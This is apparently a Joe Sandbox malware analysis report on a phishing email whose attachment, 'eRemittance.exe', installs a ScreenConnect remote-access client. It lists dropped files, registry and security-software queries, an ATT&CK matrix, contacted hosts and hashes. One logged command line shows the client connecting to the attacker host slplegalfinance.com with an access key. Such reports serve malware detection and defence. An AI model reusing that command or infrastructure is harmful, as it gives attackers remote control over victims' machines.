                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: 5AD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: 74D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: 5C10000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: 64D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: 84D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: 94D0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 12C0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 19B0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeMemory allocated: 17E0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 14B0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeMemory allocated: 1AEF0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\eRemittance.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE23F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID83C.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Users\user\Downloads\eRemittance.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 5876Thread sleep count: 39 > 30
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 640Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Downloads\eRemittance.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\eRemittance.exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\eRemittance.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\eRemittance.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=b3dedd11-6dd3-4216-bf0b-f7d49e88a24d&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv&c=&c=update&c=&c=&c=&c=&c=&c="
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Users\user\Downloads\eRemittance.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: Yara matchFile source: C:\Users\user\Downloads\Unconfirmed 376437.crdownload, type: DROPPED
                      Source: Yara matchFile source: 0000000D.00000002.1465099103.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.1499986556.0000000000AF2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1470052005.00000000074D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.1442769522.0000000000936000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1458252749.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Windows\Temp\~DFCA0C09BBD88D1D46.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Temp\~DF61B1AA59FC6BE6BD.TMP, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                      Source: Yara matchFile source: C:\Config.Msi\49dfbf.rbs, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\MSIE21F.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
                      Source: Yara matchFile source: 00000015.00000002.2498905500.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media
                      1
                      Windows Management Instrumentation
                      1
                      Component Object Model Hijacking
                      1
                      Component Object Model Hijacking
                      22
                      Masquerading
                      OS Credential Dumping13
                      Security Software Discovery
                      Remote ServicesData from Local System2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      2
                      Windows Service
                      2
                      Windows Service
                      21
                      Disable or Modify Tools
                      LSASS Memory1
                      Process Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt21
                      Browser Extensions
                      11
                      Process Injection
                      51
                      Virtualization/Sandbox Evasion
                      Security Account Manager51
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Registry Run Keys / Startup Folder
                      1
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      NTDS11
                      Peripheral Device Discovery
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Rundll32
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Extra Window Memory Injection
                      1
                      DLL Side-Loading
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Extra Window Memory Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      C:\Users\user\Downloads\Unconfirmed 376437.crdownload18%ReversingLabsWin32.PUA.ConnectWise
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                      C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID83C.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID83C.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                      C:\Windows\Installer\MSIE23F.tmp0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-w.us-east-1.amazonaws.com
                      3.5.28.195
                      truefalse
                        high
                        bitbucket.org
                        185.166.143.48
                        truefalse
                          high
                          bahraincv.com
                          192.254.226.219
                          truefalse
                            unknown
                            slplegalfinance.com
                            185.143.228.176
                            truefalse
                              high
                              clicktime.cloud.postoffice.net
                              165.212.65.140
                              truefalse
                                high
                                fub.direct
                                18.172.112.30
                                truefalse
                                  high
                                  www.google.com
                                  142.250.185.68
                                  truefalse
                                    high
                                    bbuseruploads.s3.amazonaws.com
                                    unknown
                                    unknownfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      52.113.194.132
                                      unknownUnited States
                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      142.250.185.68
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      1.1.1.1
                                      unknownAustralia
                                      13335CLOUDFLARENETUSfalse
                                      142.250.186.174
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      18.172.112.30
                                      fub.directUnited States
                                      3MIT-GATEWAYSUSfalse
                                      142.251.173.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      165.212.65.140
                                      clicktime.cloud.postoffice.netUnited States
                                      14454PERIMETER-ESECURITYUSfalse
                                      185.143.228.176
                                      slplegalfinance.comGermany
                                      61317ASDETUKhttpwwwheficedcomGBfalse
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      142.250.185.174
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      185.166.143.48
                                      bitbucket.orgGermany
                                      16509AMAZON-02USfalse
                                      142.250.185.131
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      52.109.28.46
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      192.254.226.219
                                      bahraincv.comUnited States
                                      46606UNIFIEDLAYER-AS-1USfalse
                                      3.5.28.195
                                      s3-w.us-east-1.amazonaws.comUnited States
                                      14618AMAZON-AESUSfalse
                                      20.42.73.31
                                      unknownUnited States
                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                      172.217.16.131
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      IP
                                      192.168.2.16
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1593855
                                      Start date and time:2025-01-17 18:45:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:25
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      Analysis Mode:stream
                                      Analysis stop reason:Timeout
                                      Sample name:phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml
                                      Detection:MAL
                                      Classification:mal84.evad.winEML@45/54@14/141
                                      Cookbook Comments:
                                      • Found application associated with file extension: .eml
                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 172.217.16.131, 142.250.185.174, 142.251.173.84, 142.250.184.238, 142.250.186.46, 20.42.73.31, 216.58.206.78
                                      • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, prod.configsvc1.live.com.akadns.net, clientservices.googleapis.com, s-0005-office.config.skype.com, onedscolprdeus21.eastus.cloudapp.azure.com, mobile.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, clients2.google.com, redirector.gvt1.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, clients.l.google.com, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, uks-azsc-config.officeapps.live.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: bahraincv.com
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):219728
                                      Entropy (8bit):6.581081686214598
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:474167A6EDB2BE6B084920ED3F3613EC
                                      SHA1:753D7ADE74841D3CD1D108CD9D0C04B3EE3ACE36
                                      SHA-256:A1349F05B4C147A64F9CAAA91A265183BE0233156D144108A8425B5B2EF8E772
